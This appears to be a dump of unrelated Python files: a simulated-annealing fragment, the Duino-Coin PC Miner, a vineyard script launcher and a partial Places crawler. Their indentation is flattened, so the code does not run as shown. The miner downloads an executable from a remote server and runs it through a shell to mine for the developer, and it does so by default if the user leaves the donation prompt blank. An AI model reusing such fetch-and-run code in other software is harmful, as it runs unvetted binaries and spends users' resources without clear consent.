#copy nodes data
temp_nodes = copy.deepcopy(nodes)
#get nodes to swap for temp_nodes
new_swap = select_nodes(temp_nodes, old_swap)
old_swap = new_swap
#modify node data
temp_nodes = make_swap(temp_nodes, new_swap)
#get cost for new swap
new_cost = calculate_cost(temp_nodes, nets)
dc = new_cost - current_cost
#if good
if(dc<0):
nodes = temp_nodes
sigma_list.append(new_cost)
#update best
#if bad
else:
r = random.random()
if(r< math.e**(-dc/current_temp)):
nodes = temp_nodes
sigma_list.append(new_cost)
if(calculate_cost(nodes, nets)<calculate_cost(optimum, nets)):
optimum = nodes
#current_temp = 0.98 *current_temp
#acceptance ratio of moves accepted to total tried
R_accept = len(sigma_list)/iterations
previous_temp = copy.deepcopy(current_temp)
if(0.96 < R_accept):
alpha = 0.5
elif(0.8 < R_accept and R_accept<=0.96):
alpha = 0.9
elif(0.05 < R_accept and R_accept<=0.8):
if(iterations==500):
alpha = 0.98
else:
alpha = 0.95
elif(R_accept<=0.05):
alpha = 0.8
r_val.append(alpha)
try:
if(hybrid == 1):
#check if temperature is stuck
if(isrepeating ==5):
current_temp = alpha*current_temp
isrepeating = 0
elif(isrepeating >=10):
current_temp = 0
else:
sigma = statistics.stdev(sigma_list)
current_temp = current_temp *math.e**(-0.7*(current_temp/sigma))
isrepeating = 0
else:
current_temp = alpha*current_temp
isrepeating = 0
except Exception:
pass
#COMMENT OUT THIS LINE IF YOU DON'T WANT ANY UPDATES
print(alpha,calculate_cost(nodes, nets), current_temp )
if(str(previous_temp)[:7] == str(current_temp)[:7]):
isrepeating = isrepeating + 1
#print(isrepeating)
if(current_temp<5e-6):
current_temp = 0
#add for plotting
if(gui_choice == "y"):
pt.update_data_sync(current_temp, calculate_cost(nodes, nets))
queue.put("GO")
# print(calculate_cost(nodes,nets), current_temp)
final_cost = calculate_cost(nodes, nets)
elapsed = timeit.default_timer() - start_time
print("time elapsed : ", elapsed)
print("final cost :", final_cost)
if(gui_choice == 'y'):
queue.put('BYE')
|
PC_Miner.py
|
#!/usr/bin/env python3
"""
Duino-Coin Official PC Miner 2.74 © MIT licensed
https://duinocoin.com
https://github.com/revoxhere/duino-coin
Duino-Coin Team & Community 2019-2021
"""
from time import time, sleep, strptime, ctime
from hashlib import sha1
from socket import socket
from multiprocessing import Lock as thread_lock
from multiprocessing import cpu_count, current_process
from multiprocessing import Process, Manager
from threading import Thread
from datetime import datetime
from random import randint
from os import execl, mkdir, _exit
from subprocess import DEVNULL, Popen, check_call
import pip
import select
# import testerlib as njs
# from testerlib import log as log
import sys
import os
import json
import requests
from pathlib import Path
from re import sub
from random import choice
from platform import machine as osprocessor
from signal import SIGINT, signal
from locale import LC_ALL, getdefaultlocale, getlocale, setlocale
from configparser import ConfigParser
configparser = ConfigParser()
def handler(signal_received, frame):
"""
Nicely handle CTRL+C exit
"""
if current_process().name == "MainProcess":
pretty_print(
get_string("sigint_detected")
+ Style.NORMAL
+ Fore.RESET
+ get_string("goodbye"),
"warning")
_exit(0)
def install(package):
"""
Automatically installs python pip package and restarts the program
"""
try:
pip.main(["install", package])
except AttributeError:
check_call([sys.executable, '-m', 'pip', 'install', package])
execl(sys.executable, sys.executable, *sys.argv)
try:
from xxhash import xxh64
xxhash_en = True
except ModuleNotFoundError:
print("Xxhash is not installed - this mining algorithm will be disabled")
xxhash_en = False
try:
from colorama import Back, Fore, Style, init
init(autoreset=True)
except ModuleNotFoundError:
print("Colorama is not installed. "
+ "Miner will try to automatically install it "
+ "If it fails, please manually execute "
+ "python3 -m pip install colorama")
install("colorama")
try:
import cpuinfo
except ModuleNotFoundError:
print("Cpuinfo is not installed. "
+ "Miner will try to automatically install it "
+ "If it fails, please manually execute "
+ "python3 -m pip install py-cpuinfo")
install("py-cpuinfo")
try:
from pypresence import Presence
except ModuleNotFoundError:
print("Pypresence is not installed. "
+ "Miner will try to automatically install it "
+ "If it fails, please manually execute "
+ "python3 -m pip install pypresence")
install("pypresence")
class Settings:
"""
Class containing default miner and server settings
"""
ENCODING = "UTF8"
SEPARATOR = ","
VER = 2.74
DATA_DIR = "Duino-Coin PC Miner " + str(VER)
TRANSLATIONS = ("https://raw.githubusercontent.com/"
+ "revoxhere/"
+ "duino-coin/master/Resources/"
+ "PC_Miner_langs.json")
TRANSLATIONS_FILE = "/Translations.json"
SETTINGS_FILE = "/Settings.cfg"
SOC_TIMEOUT = 15
REPORT_TIME = 50
DONATE_LVL = 0
BLOCK = " ‖ "
PICK = ""
COG = " @"
if os.name != "nt" or bool(os.name == "nt" and os.environ.get("WT_SESSION")):
# Windows' cmd does not support emojis, shame!
PICK = " ⛏"
COG = " ⚙"
class Algorithms:
"""
Class containing algorithms used by the miner
For more info about the implementation refer to the Duino whitepaper:
https://github.com/revoxhere/duino-coin/blob/gh-pages/assets/whitepaper.pdf
"""
def DUCOS1(last_h: str, exp_h: str, diff: int, eff: int):
time_start = time()
base_hash = sha1(last_h.encode('ascii'))
for nonce in range(100 * diff + 1):
temp_h = base_hash.copy()
temp_h.update(str(nonce).encode('ascii'))
d_res = temp_h.hexdigest()
if d_res == exp_h:
time_elapsed = time() - time_start
hashrate = nonce / time_elapsed
return [nonce, hashrate]
return [0, 0]
def XXHASH(last_h: str, exp_h: str, diff: int, eff: int):
time_start = time()
for nonce in range(100 * diff + 1):
d_res = xxh64(last_h + str(nonce),
seed=2811).hexdigest()
if d_res == exp_h:
time_elapsed = time() - time_start
hashrate = nonce / time_elapsed
return [nonce, hashrate]
return [0, 0]
class Client:
"""
Class helping to organize socket connections
"""
def connect(pool: tuple):
global s
s = socket()
s.settimeout(Settings.SOC_TIMEOUT)
s.connect((pool))
def send(msg: str):
sent = s.sendall(str(msg).encode(Settings.ENCODING))
return True
def recv(limit: int = 128):
data = s.recv(limit).decode(Settings.ENCODING).rstrip("\n")
return data
def fetch_pool():
"""
Fetches best pool from the /getPool API endpoint
"""
while True:
pretty_print(" " + get_string("connection_search"),
"warning", "net0")
try:
response = requests.get(
"https://server.duinocoin.com/getPool").json()
if response["success"] == True:
NODE_ADDRESS = response["ip"]
NODE_PORT = response["port"]
return (NODE_ADDRESS, NODE_PORT)
elif "message" in response:
pretty_print(f"Warning: {response['message']}"
+ ", retrying in 15s", "warning", "net0")
sleep(15)
else:
raise Exception(
"no response - IP ban or connection error")
except Exception as e:
pretty_print(f"Error fetching mining node: {e}"
+ ", retrying in 15s", "error", "net0")
sleep(15)
class Donate:
def load(donation_level):
if donation_level > 0:
if os.name == 'nt':
if not Path(
f"{Settings.DATA_DIR}/Donate.exe").is_file():
url = ('https://server.duinocoin.com/'
+ 'donations/DonateExecutableWindows.exe')
r = requests.get(url)
with open(f"{Settings.DATA_DIR}/Donate.exe",
'wb') as f:
f.write(r.content)
elif os.name == "posix":
if osprocessor() == "aarch64":
url = ('https://server.duinocoin.com/'
+ 'donations/DonateExecutableAARCH64')
elif osprocessor() == "armv7l":
url = ('https://server.duinocoin.com/'
+ 'donations/DonateExecutableAARCH32')
else:
url = ('https://server.duinocoin.com/'
+ 'donations/DonateExecutableLinux')
if not Path(
f"{Settings.DATA_DIR}/Donate").is_file():
r = requests.get(url)
with open(f"{Settings.DATA_DIR}/Donate",
"wb") as f:
f.write(r.content)
def start(donation_level):
if os.name == 'nt':
cmd = (f'cd "{Settings.DATA_DIR}" & Donate.exe '
+ '-o stratum+tcp://xmg.minerclaim.net:3333 '
+ f'-u revox.donate -p x -s 4 -e {donation_level*10}')
elif os.name == 'posix':
cmd = (f'cd "{Settings.DATA_DIR}" && chmod +x Donate '
+ '&& nice -20 ./Donate -o '
+ 'stratum+tcp://xmg.minerclaim.net:3333 '
+ f'-u revox.donate -p x -s 4 -e {donation_level*10}')
if donation_level <= 0:
pretty_print(
Fore.YELLOW + get_string('free_network_warning').lstrip()
+ get_string('donate_warning').replace("\n", "\n\t\t")
+ Fore.GREEN + 'https://duinocoin.com/donate'
+ Fore.YELLOW + get_string('learn_more_donate'),
'warning', 'sys0')
sleep(5)
if donation_level > 0:
donateExecutable = Popen(cmd, shell=True, stderr=DEVNULL)
pretty_print(get_string('thanks_donation').replace("\n", "\n\t\t"),
'error', 'sys0')
def get_prefix(symbol: str,
val: float,
accuracy: int):
"""
H/s, 1000 => 1 kH/s
"""
if val >= 1_000_000_000_000: # Really?
val = str(round((val / 1_000_000_000_000), accuracy)) + " T"
elif val >= 1_000_000_000:
val = str(round((val / 1_000_000_000), accuracy)) + " G"
elif val >= 1_000_000:
val = str(round((val / 1_000_000), accuracy)) + " M"
elif val >= 1_000:
val = str(round((val / 1_000), accuracy)) + " k"
else:
val = str(round(val)) + " "
return val + symbol
def periodic_report(start_time, end_time,
shares, hashrate, uptime):
"""
Displays nicely formatted uptime stats
"""
seconds = round(end_time - start_time)
pretty_print(get_string("periodic_mining_report")
+ Fore.RESET + Style.NORMAL
+ get_string("report_period")
+ str(seconds) + get_string("report_time")
+ get_string("report_body1")
+ str(shares) + get_string("report_body2")
+ str(round(shares/seconds, 1))
+ get_string("report_body3")
+ get_string("report_body4")
+ str(get_prefix("H/s", hashrate, 2))
+ get_string("report_body5")
+ str(int(hashrate*seconds))
+ get_string("report_body6")
+ get_string("total_mining_time")
+ str(uptime), "success")
def calculate_uptime(start_time):
"""
Returns seconds, minutes or hours passed since timestamp
"""
uptime = time() - start_time
if uptime >= 7200:
return str(round(uptime // 3600)) + get_string("uptime_hours")
elif uptime >= 3600:
return str(round(uptime // 3600)) + get_string("uptime_hour")
elif uptime >= 120:
return str(round(uptime // 60)) + get_string("uptime_minutes")
elif uptime >= 60:
return str(round(uptime // 60)) + get_string("uptime_minute")
else:
return str(round(uptime)) + get_string("uptime_seconds")
def pretty_print(msg: str = None,
state: str = "success",
sender: str = "sys0"):
"""
Produces nicely formatted CLI output for messages:
HH:MM:SS |sender| msg
"""
if sender.startswith("net"):
bg_color = Back.BLUE
elif sender.startswith("cpu"):
bg_color = Back.YELLOW
elif sender.startswith("sys"):
bg_color = Back.GREEN
if state == "success":
fg_color = Fore.GREEN
elif state == "error":
fg_color = Fore.RED
else:
fg_color = Fore.YELLOW
with thread_lock():
print(Fore.WHITE + datetime.now().strftime(Style.DIM + "%H:%M:%S ")
+ Style.BRIGHT + bg_color + " " + sender + " "
+ Back.RESET + " " + fg_color + msg.strip())
def share_print(id, type,
accept, reject,
hashrate, total_hashrate,
computetime, diff, ping,
back_color):
"""
Produces nicely formatted CLI output for shares:
HH:MM:SS |cpuN| ⛏ Accepted 0/0 (100%) ∙ 0.0s ∙ 0 kH/s ⚙ diff 0 k ∙ ping 0ms
"""
total_hashrate = get_prefix("H/s", total_hashrate, 2)
diff = get_prefix("", int(diff), 0)
if type == "accept":
share_str = get_string("accepted")
fg_color = Fore.GREEN
elif type == "block":
share_str = get_string("block_found")
fg_color = Fore.YELLOW
else:
share_str = get_string("rejected")
fg_color = Fore.RED
with thread_lock():
print(Fore.WHITE + datetime.now().strftime(Style.DIM + "%H:%M:%S ")
+ Fore.WHITE + Style.BRIGHT + back_color + Fore.RESET
+ " cpu" + str(id) + " " + Back.RESET
+ fg_color + Settings.PICK + share_str + Fore.RESET
+ str(accept) + "/" + str(accept + reject) + Fore.YELLOW
+ " (" + str(round(accept / (accept + reject) * 100)) + "%)"
+ Style.NORMAL + Fore.RESET
+ " ∙ " + str("%04.1f" % float(computetime)) + "s"
+ Style.NORMAL + " ∙ " + Fore.BLUE + Style.BRIGHT
+ str(total_hashrate) + Fore.RESET + Style.NORMAL
+ Settings.COG + f" diff {diff} ∙ " + Fore.CYAN
+ f"ping {(int(ping))}ms")
def get_string(string_name):
"""
Gets a string from the language file
"""
if string_name in lang_file[lang]:
return lang_file[lang][string_name]
elif string_name in lang_file["english"]:
return lang_file["english"][string_name]
else:
return "String not found: " + string_name
class Miner:
def greeting():
diff_str = get_string("net_diff_short")
if user_settings["start_diff"] == "LOW":
diff_str = get_string("low_diff_short")
elif user_settings["start_diff"] == "MEDIUM":
diff_str = get_string("medium_diff_short")
current_hour = strptime(ctime(time())).tm_hour
greeting = get_string("greeting_back")
if current_hour < 12:
greeting = get_string("greeting_morning")
elif current_hour == 12:
greeting = get_string("greeting_noon")
elif current_hour > 12 and current_hour < 18:
greeting = get_string("greeting_afternoon")
elif current_hour >= 18:
greeting = get_string("greeting_evening")
print("\n" + Style.DIM + Fore.YELLOW + Settings.BLOCK + Fore.YELLOW
+ Style.BRIGHT + get_string("banner") + Style.RESET_ALL
+ Fore.MAGENTA + " (" + str(Settings.VER) + ") "
+ Fore.RESET + "2019-2021")
print(Style.DIM + Fore.YELLOW + Settings.BLOCK + Style.NORMAL
+ Fore.YELLOW + "https://github.com/revoxhere/duino-coin")
if lang != "english":
print(Style.DIM + Fore.YELLOW + Settings.BLOCK
+ Style.NORMAL + Fore.RESET + lang.capitalize()
+ " translation: " + Fore.YELLOW
+ get_string("translation_autor"))
try:
print(Style.DIM + Fore.YELLOW + Settings.BLOCK
+ Style.NORMAL + Fore.RESET + "CPU: " + Style.BRIGHT
+ Fore.YELLOW + str(user_settings["threads"])
+ "x " + str(cpu["brand_raw"]))
except:
print(Style.DIM + Fore.YELLOW + Settings.BLOCK
+ Style.NORMAL + Fore.RESET + "CPU: " + Style.BRIGHT
+ Fore.YELLOW + str(user_settings["threads"])
+ "x threads")
if os.name == "nt" or os.name == "posix":
print(Style.DIM + Fore.YELLOW
+ Settings.BLOCK + Style.NORMAL + Fore.RESET
+ get_string("donation_level") + Style.BRIGHT
+ Fore.YELLOW + str(user_settings["donate"]))
print(Style.DIM + Fore.YELLOW + Settings.BLOCK
+ Style.NORMAL + Fore.RESET + get_string("algorithm")
+ Style.BRIGHT + Fore.YELLOW + user_settings["algorithm"]
+ Settings.COG + " " + diff_str)
if user_settings["identifier"] != "None":
print(Style.DIM + Fore.YELLOW + Settings.BLOCK
+ Style.NORMAL + Fore.RESET + get_string("rig_identifier")
+ Style.BRIGHT + Fore.YELLOW + user_settings["identifier"])
print(Style.DIM + Fore.YELLOW + Settings.BLOCK
+ Style.NORMAL + Fore.RESET + str(greeting)
+ ", " + Style.BRIGHT + Fore.YELLOW
+ str(user_settings["username"]) + "!\n")
def preload():
"""
Creates needed directories and files for the miner
"""
global lang_file
global lang
if not Path(Settings.DATA_DIR).is_dir():
mkdir(Settings.DATA_DIR)
if not Path(Settings.DATA_DIR + Settings.TRANSLATIONS_FILE).is_file():
with open(Settings.DATA_DIR + Settings.TRANSLATIONS_FILE,
"wb") as f:
f.write(requests.get(Settings.TRANSLATIONS).content)
with open(Settings.DATA_DIR + Settings.TRANSLATIONS_FILE, "r",
encoding=Settings.ENCODING) as file:
lang_file = json.load(file)
try:
if not Path(Settings.DATA_DIR + Settings.SETTINGS_FILE).is_file():
locale = getdefaultlocale()[0]
if locale.startswith("es"):
lang = "spanish"
elif locale.startswith("pl"):
lang = "polish"
elif locale.startswith("fr"):
lang = "french"
elif locale.startswith("fa"):
lang = "farsi"
elif locale.startswith("mt"):
lang = "maltese"
elif locale.startswith("ru"):
lang = "russian"
elif locale.startswith("de"):
lang = "german"
elif locale.startswith("tr"):
lang = "turkish"
elif locale.startswith("pr"):
lang = "portugese"
elif locale.startswith("it"):
lang = "italian"
elif locale.startswith("zh"):
lang = "chinese_simplified"
elif locale.startswith("th"):
lang = "thai"
else:
lang = "english"
else:
try:
configparser.read(Settings.DATA_DIR
+ Settings.SETTINGS_FILE)
lang = configparser["PC Miner"]["language"]
except Exception:
lang = "english"
except Exception as e:
print("Error with lang file, falling back to english: " + str(e))
lang = "english"
def load_cfg():
"""
Loads miner settings file or starts the config tool
"""
if not Path(Settings.DATA_DIR + Settings.SETTINGS_FILE).is_file():
print(get_string("basic_config_tool")
+ Settings.DATA_DIR
+ get_string("edit_config_file_warning")
+ "\n"
+ get_string("dont_have_account")
+ Fore.YELLOW
+ get_string("wallet")
+ Fore.RESET
+ get_string("register_warning"))
username = input(get_string("ask_username") + Style.BRIGHT)
if not username:
username = choice(["revox", "Bilaboz", "JoyBed", "Connor2"])
algorithm = "DUCO-S1"
if xxhash_en:
print(Style.BRIGHT
+ "1" + Style.NORMAL + " - DUCO-S1 ("
+ get_string("recommended")
+ ")\n" + Style.BRIGHT
+ "2" + Style.NORMAL + " - XXHASH")
prompt = sub(r"\D", "",
input(get_string("ask_algorithm")
+ Style.BRIGHT))
if prompt == "2":
algorithm = "XXHASH"
intensity = 100 # None
##
# intensity = sub(r"\D", "",
# input(Style.NORMAL
## + get_string("ask_intensity")
# + Style.BRIGHT))
# if not intensity:
## intensity = 95
# elif float(intensity) > 100:
## intensity = 100
# elif float(intensity) < 1:
## intensity = 1
threads = sub(r"\D", "",
input(Style.NORMAL + get_string("ask_threads")
+ str(cpu_count()) + "): " + Style.BRIGHT))
if not threads:
threads = cpu_count()
if int(threads) > 8:
threads = 8
pretty_print(
Style.BRIGHT
+ get_string("max_threads_notice"))
elif int(threads) < 1:
threads = 1
print(Style.BRIGHT
+ "1" + Style.NORMAL + " - " + get_string("low_diff")
+ "\n" + Style.BRIGHT
+ "2" + Style.NORMAL + " - " + get_string("medium_diff")
+ "\n" + Style.BRIGHT
+ "3" + Style.NORMAL + " - " + get_string("net_diff"))
start_diff = sub(r"\D", "",
input(Style.NORMAL + get_string("ask_difficulty")
+ Style.BRIGHT))
if start_diff == "1":
start_diff = "LOW"
elif start_diff == "3":
start_diff = "NET"
else:
start_diff = "MEDIUM"
rig_id = input(Style.NORMAL + get_string("ask_rig_identifier")
+ Style.BRIGHT)
if rig_id.lower() == "y":
rig_id = str(input(Style.NORMAL + get_string("ask_rig_name")
+ Style.BRIGHT))
else:
rig_id = "None"
donation_level = '0'
if os.name == 'nt' or os.name == 'posix':
donation_level = input(Style.NORMAL
+ get_string('ask_donation_level')
+ Style.BRIGHT)
donation_level = sub(r'\D', '', donation_level)
if donation_level == '':
donation_level = 1
if float(donation_level) > int(5):
donation_level = 5
if float(donation_level) < int(0):
donation_level = 0
configparser["PC Miner"] = {
"username": username,
"intensity": intensity,
"threads": threads,
"start_diff": start_diff,
"donate": int(donation_level),
"identifier": rig_id,
"algorithm": algorithm,
"language": lang,
"soc_timeout": Settings.SOC_TIMEOUT,
"report_sec": Settings.REPORT_TIME,
"discord_rp": "y"}
with open(Settings.DATA_DIR + Settings.SETTINGS_FILE,
"w") as configfile:
configparser.write(configfile)
print(Style.RESET_ALL + get_string("config_saved"))
configparser.read(Settings.DATA_DIR
+ Settings.SETTINGS_FILE)
return configparser["PC Miner"]
def m_connect(id, pool):
retry_count = 0
while True:
try:
if retry_count > 3:
pool = Client.fetch_pool()
retry_count = 0
socket_connection = Client.connect(pool)
POOL_VER = Client.recv(5)
if id == 0:
Client.send("MOTD")
motd = Client.recv(512).replace("\n", "\n\t\t")
pretty_print("MOTD: " + Fore.RESET + Style.NORMAL
+ str(motd), "success", "net" + str(id))
if float(POOL_VER) <= Settings.VER:
pretty_print(get_string("connected") + Fore.RESET
+ Style.NORMAL +
get_string("connected_server")
+ str(POOL_VER) + ", " + pool[0] + ":"
+ str(pool[1]) + ")", "success",
"net" + str(id))
else:
pretty_print(get_string("outdated_miner")
+ str(Settings.VER) + ") -"
+ get_string("server_is_on_version")
+ str(POOL_VER) + Style.NORMAL
+ Fore.RESET +
get_string("update_warning"),
"warning", "net" + str(id))
sleep(5)
break
except Exception as e:
pretty_print(get_string('connecting_error')
+ Style.NORMAL + f' (connection err: {e})',
'error', 'net0')
retry_count += 1
sleep(10)
def mine(id: int, user_settings: list,
pool: tuple,
accept: int, reject: int,
hashrate: list,
single_miner_id: str):
"""
Main section that executes the functionalities from the sections above.
"""
using_algo = get_string("using_algo")
if user_settings["algorithm"] == "XXHASH":
using_algo = get_string("using_algo_xxh")
pretty_print(get_string("mining_thread") + str(id)
+ get_string("mining_thread_starting")
+ Style.NORMAL + Fore.RESET + using_algo + Fore.YELLOW
+ str(user_settings["intensity"])
+ "% " + get_string("efficiency"),
"success", "sys"+str(id))
last_report = time()
r_shares, last_shares = 0, 0
while True:
try:
Miner.m_connect(id, pool)
while True:
try:
while True:
job_req = "JOB"
if user_settings["algorithm"] == "XXHASH":
job_req = "JOBXX"
Client.send(job_req
+ Settings.SEPARATOR
+ str(user_settings["username"])
+ Settings.SEPARATOR
+ str(user_settings["start_diff"]))
job = Client.recv().split(Settings.SEPARATOR)
if len(job) == 3:
break
else:
pretty_print(
"Node message: " + str(job[1]),
"warning")
sleep(3)
while True:
time_start = time()
if user_settings["algorithm"] == "XXHASH":
back_color = Back.CYAN
result = Algorithms.XXHASH(
job[0], job[1], int(job[2]),
user_settings["intensity"])
else:
back_color = Back.YELLOW
result = Algorithms.DUCOS1(
job[0], job[1], int(job[2]),
user_settings["intensity"])
computetime = time() - time_start
hashrate[id] = result[1]
total_hashrate = sum(hashrate.values())
while True:
Client.send(f"{result[0]}"
+ Settings.SEPARATOR
+ f"{result[1]}"
+ Settings.SEPARATOR
+ "Official PC Miner"
+ f" {Settings.VER}"
+ Settings.SEPARATOR
+ f"{user_settings['identifier']}"
+ Settings.SEPARATOR
+ Settings.SEPARATOR
+ f"{single_miner_id}")
time_start = time()
feedback = Client.recv(
).split(Settings.SEPARATOR)
ping = (time() - time_start) * 1000
if feedback[0] == "GOOD":
accept.value += 1
share_print(id, "accept",
accept.value, reject.value,
result[1], total_hashrate,
computetime, job[2], ping,
back_color)
elif feedback[0] == "BLOCK":
accept.value += 1
share_print(id, "block",
accept.value, reject.value,
result[1], total_hashrate,
computetime, job[2], ping,
back_color)
elif feedback[0] == "BAD":
reject.value += 1
share_print(id, "reject",
accept.value, reject.value,
result[1], total_hashrate,
computetime, job[2], ping,
back_color)
if id == 0:
end_time = time()
elapsed_time = end_time - last_report
if elapsed_time >= Settings.REPORT_TIME:
r_shares = accept.value - last_shares
uptime = calculate_uptime(
mining_start_time)
periodic_report(last_report, end_time,
r_shares,
sum(hashrate.values()),
uptime)
last_report = time()
last_shares = accept.value
break
break
except Exception as e:
pretty_print(get_string("error_while_mining")
+ " " + str(e), "error", "net" + str(id))
sleep(5)
break
except Exception as e:
pass
class Discord_rp:
def connect():
global RPC
try:
RPC = Presence(808045598447632384)
RPC.connect()
Thread(target=Discord_rp.update).start()
except Exception as e:
#print("Error launching Discord RPC thread: " + str(e))
pass
def update():
while True:
try:
total_hashrate = get_prefix("H/s", sum(hashrate.values()), 2)
RPC.update(details="Hashrate: " + str(total_hashrate),
start=mining_start_time,
state=str(accept.value) + "/"
+ str(reject.value + accept.value)
+ " accepted shares",
large_image="ducol",
large_text="Duino-Coin, "
+ "a coin that can be mined with almost everything"
+ ", including AVR boards",
buttons=[{"label": "Visit duinocoin.com",
"url": "https://duinocoin.com"},
{"label": "Join the Discord",
"url": "https://discord.gg/k48Ht5y"}])
except Exception as e:
#print("Error updating Discord RPC thread: " + str(e))
pass
sleep(15)
Miner.preload()
p_list = []
mining_start_time = time()
if __name__ == "__main__":
from multiprocessing import freeze_support
freeze_support()
cpu = cpuinfo.get_cpu_info()
accept = Manager().Value("i", 0)
reject = Manager().Value("i", 0)
hashrate = Manager().dict()
signal(SIGINT, handler)
user_settings = Miner.load_cfg()
Miner.greeting()
fastest_pool = Client.fetch_pool()
Donate.load(int(user_settings["donate"]))
Donate.start(int(user_settings["donate"]))
"""
Generate a random number that's used only to
make the wallets display one miner with many threads
instead of many separate miners clogging it up
(like it was before release 2.7.3)
"""
single_miner_id = randint(0, 2811)
threads = int(user_settings["threads"])
if threads > 8:
threads = 8
pretty_print(Style.BRIGHT
+ get_string("max_threads_notice"))
for i in range(threads):
p = Process(target=Miner.mine,
args=[i, user_settings,
fastest_pool, accept, reject,
hashrate, single_miner_id])
p_list.append(p)
p.start()
sleep(0.05)
Discord_rp.connect()
for p in p_list:
p.join()
|
script.py
|
#! /usr/bin/env python
# -*- coding: utf-8 -*-
#
# Copyright 2020-2021 Alibaba Group Holding Limited.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
import json
import logging
import os
import subprocess
import sys
import threading
from .launcher import Launcher, LauncherStatus
logger = logging.getLogger('vineyard')
class ScriptLauncher(Launcher):
''' Launch the job by executing a script.
The output of the script must be printed to stdout, rather than stderr.
'''
def __init__(self, script):
super(ScriptLauncher, self).__init__()
self._script = script
self._proc = None
self._listen_out_thrd = None
self._listen_err_thrd = None
self._cmd = None
self._err_message = None
self._exit_code = None
@property
def command(self):
return self._cmd
@property
def error_message(self):
return self._err_message
@property
def exit_code(self):
return self._exit_code
def run(self, *args, **kw):
# FIXME run self._script on a set of host machines; the hosts are decided
# by the arguments passed to the launcher in `__init__` and by the input objects
cmd = [self._script]
for arg in args:
if isinstance(arg, str):
cmd.append(arg.encode('unicode-escape').decode('utf-8'))
else:
cmd.append(repr(arg))
env = os.environ.copy()
for key, value in kw.items():
# if key is all in lower cases, treat it as arguments, otherwise as the
# environment variables.
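# e.g. a hypothetical call run('input.bin', deployment='ssh', VINEYARD_IPC_SOCKET='/tmp/vineyard.sock')
# appends '--deployment ssh' to the command line and exports VINEYARD_IPC_SOCKET
# into the subprocess environment.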
if key.islower():
cmd.append('--%s' % key)
if isinstance(value, str):
cmd.append(value)
else:
cmd.append(repr(value))
else:
env[key] = value
logger.debug('command = %s', ' '.join(cmd))
self._cmd = cmd
self._proc = subprocess.Popen(cmd,
env=env,
universal_newlines=True,
encoding='utf-8',
stdout=subprocess.PIPE,
stderr=subprocess.PIPE)
self._status = LauncherStatus.RUNNING
self._listen_out_thrd = threading.Thread(target=self.read_output, args=(self._proc.stdout, ))
self._listen_out_thrd.daemon = True
self._listen_out_thrd.start()
self._err_message = []
self._listen_err_thrd = threading.Thread(target=self.read_err, args=(self._proc.stderr, ))
self._listen_err_thrd.daemon = True
self._listen_err_thrd.start()
def wait(self, timeout=None):
# fast path: reuse an existing response directly, since the IO adaptor may finish immediately.
r = super(ScriptLauncher, self).wait(timeout=0)
if r is not None:
return r
elapsed, period = 0, 1
while self._proc.poll() is None:
if timeout is not None and elapsed > timeout:
raise TimeoutError('Unable to wait for status of job [%s] after %r seconds' % (self._cmd, timeout))
r = super(ScriptLauncher, self).wait(timeout=period)
elapsed += period
if r is None:
continue
else:
return r
r = super(ScriptLauncher, self).wait(timeout=period)
if r is not None:
return r
remaining = self._proc.stdout.read()
if remaining:
for line in remaining.split('\n'):
self.parse(line)
r = super(ScriptLauncher, self).wait(timeout=period)
if r is not None:
return r
raise RuntimeError('Failed to launch job [%s], exited with %r: %s' %
(self._cmd, self._proc.poll(), ''.join(self._err_message)))
def read_output(self, stdout):
while self._proc.poll() is None:
line = stdout.readline()
if line:
self.parse(line)
logger.debug(line)
# consume all extra lines if the proc exits.
for line in stdout.readlines():
self.parse(line)
logger.debug(line)
def read_err(self, stderr):
while self._proc.poll() is None:
line = stderr.readline()
if line:
self._err_message.append(line)
self._err_message.extend(stderr.readlines())
def join(self):
self._exit_code = self._proc.wait()
if self._exit_code != 0:
self._status = LauncherStatus.FAILED
else:
self._status = LauncherStatus.SUCCEED
        # make the listener threads exit.
self._listen_out_thrd.join()
self._listen_err_thrd.join()
def dispose(self, desired=True):
if self._status == LauncherStatus.RUNNING:
try:
self._proc.terminate()
except ProcessLookupError:
pass
if desired:
self._status = LauncherStatus.FAILED
else:
self._status = LauncherStatus.SUCCEED
return self._status
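# A minimal usage sketch (not part of the original module), assuming a
# hypothetical executable "./run_job.sh" that reports its result on stdout.
# The script path, the "replicas" option and the environment variable below
# are illustrative only.
def _demo_script_launcher():
    launcher = ScriptLauncher('./run_job.sh')
    # lowercase keyword arguments become "--replicas 2"; uppercase ones are
    # exported as environment variables for the child process.
    launcher.run('input.bin', replicas=2, SOME_ENV_FLAG='1')
    response = launcher.wait(timeout=60)  # parsed from the script's stdout
    launcher.join()
    return response, launcher.exit_code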
|
crawler.py
|
#!/usr/bin/env python
# -*- coding: utf-8 -*-
import calendar
import datetime
import json
import logging
import math
import re
import ssl
import threading
import urllib.parse
import urllib.request
from queue import Queue
from time import sleep, time
import requests
from geopy import Point
from geopy.distance import geodesic, GeodesicDistance
# urls for google api web service
BASE_URL = "https://maps.googleapis.com/maps/api/place/"
RADAR_URL = BASE_URL + "radarsearch/json?location={},{}&radius={}&types={}&key={}"
NEARBY_URL = BASE_URL + "nearbysearch/json?location={},{}&radius={}&types={}&key={}"
DETAIL_URL = BASE_URL + "details/json?placeid={}&key={}"
# user agent for populartimes request
USER_AGENT = {"User-Agent": "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_12_1) "
"AppleWebKit/537.36 (KHTML, like Gecko) "
"Chrome/54.0.2840.98 Safari/537.36"}
class PopulartimesException(Exception):
"""Exception raised for errors in the input.
Attributes:
expression -- input expression in which the error occurred
message -- explanation of the error
"""
def __init__(self, expression, message):
self.expression = expression
self.message = message
def rect_circle_collision(rect_left, rect_right, rect_bottom, rect_top, circle_x, circle_y, radius):
# returns true iff circle intersects rectangle
    def clamp(val, lo, hi):
        # limit the value to the range lo..hi (avoids shadowing built-in min/max)
        if val < lo:
            return lo
        if val > hi:
            return hi
        return val
# Find the closest point to the circle within the rectangle
closest_x = clamp(circle_x, rect_left, rect_right)
closest_y = clamp(circle_y, rect_bottom, rect_top)
# Calculate the distance between the circle's center and this closest point
dist_x = circle_x - closest_x
dist_y = circle_y - closest_y
# If the distance is less than the circle's radius, an intersection occurs
dist_sq = (dist_x * dist_x) + (dist_y * dist_y)
return dist_sq < (radius * radius)
